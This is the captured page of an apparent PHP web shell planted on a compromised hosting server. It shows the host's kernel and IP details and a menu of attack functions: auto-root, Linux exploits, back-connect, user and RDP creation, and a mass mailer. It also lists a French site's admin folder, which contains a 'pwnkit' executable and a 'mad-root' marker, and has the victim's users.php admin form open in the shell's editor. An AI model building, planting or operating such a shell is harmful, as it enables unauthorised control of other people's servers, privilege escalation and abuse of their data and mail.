Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
admin /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
contacts.php
2.22
KB
-rw----r--
dashboard.php
3.3
KB
-rw----r--
layout.php
4.61
KB
-rw----r--
login.php
1.73
KB
-rw----r--
news-edit.php
15.52
KB
-rw----r--
news-form.php
7.39
KB
-rw----r--
news.php
3.55
KB
-rw----r--
page-edit.php
16.18
KB
-rw----r--
pages.php
3
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
settings.php
4.46
KB
-rw----r--
subsidiaries.php
2.1
KB
-rw----r--
subsidiary-edit.php
3.76
KB
-rw----r--
users.php
3.48
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : users.php
<div class="admin-section"> <h2 class="admin-section-title">Ajouter un administrateur</h2> <form action="/admin/users/create" method="POST" style="display: flex; flex-direction: column; gap: 15px; margin-bottom: 2rem;"> <input type="hidden" name="_csrf" value="<?= $csrf ?>"> <div style="display: flex; gap: 10px;"> <div style="flex: 1;"> <input type="text" name="username" placeholder="Nom" class="field input" style="width: 100%; height: 44px; padding: 0 10px; background: var(--adm-dark3); border: 1px solid var(--adm-grey1); color: var(--adm-white);" required> </div> <div style="flex: 1;"> <input type="email" name="email" placeholder="Email" class="field input" style="width: 100%; height: 44px; padding: 0 10px; background: var(--adm-dark3); border: 1px solid var(--adm-grey1); color: var(--adm-white);" required> </div> <div style="flex: 1;"> <input type="password" name="password" placeholder="Mot de passe" class="field input" style="width: 100%; height: 44px; padding: 0 10px; background: var(--adm-dark3); border: 1px solid var(--adm-grey1); color: var(--adm-white);" required> </div> <div style="flex: 1;"> <select name="role" class="field input" style="width: 100%; height: 44px; padding: 0 10px; background: var(--adm-dark3); border: 1px solid var(--adm-grey1); color: var(--adm-white);"> <option value="editor">Éditeur</option> <option value="superadmin">Super Admin</option> </select> </div> </div> <div style="display: flex; justify-content: flex-end;"> <button type="submit" class="quick-btn quick-btn-primary" style="height: 44px; padding: 0 30px;">Créer</button> </div> </form> </div> <div class="admin-section"> <h2 class="admin-section-title">Liste des administrateurs</h2> <div class="admin-table-wrap"> <table class="admin-table"> <thead> <tr> <th>Utilisateur</th> <th>Rôle</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($admins as $u): ?> <tr> <td><?= $e($u['username']) ?></td> <td><?= $u['role'] ?></td> <td> <div style="display: flex; gap: 10px;"> <form action="/admin/users/toggle/<?= $u['id'] ?>" method="POST"> <input type="hidden" name="_csrf" value="<?= $csrf ?>"> <button type="submit" class="quick-btn"><?= $u['is_active'] ? 'Désactiver' : 'Activer' ?></button> </form> <?php if ($u['id'] != $_SESSION['admin_id']): ?> <form action="/admin/users/delete/<?= $u['id'] ?>" method="POST"> <input type="hidden" name="_csrf" value="<?= $csrf ?>"> <button type="submit" class="quick-btn" style="color: var(--adm-red);">Supprimer</button> </form> <?php endif; ?> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div>
Close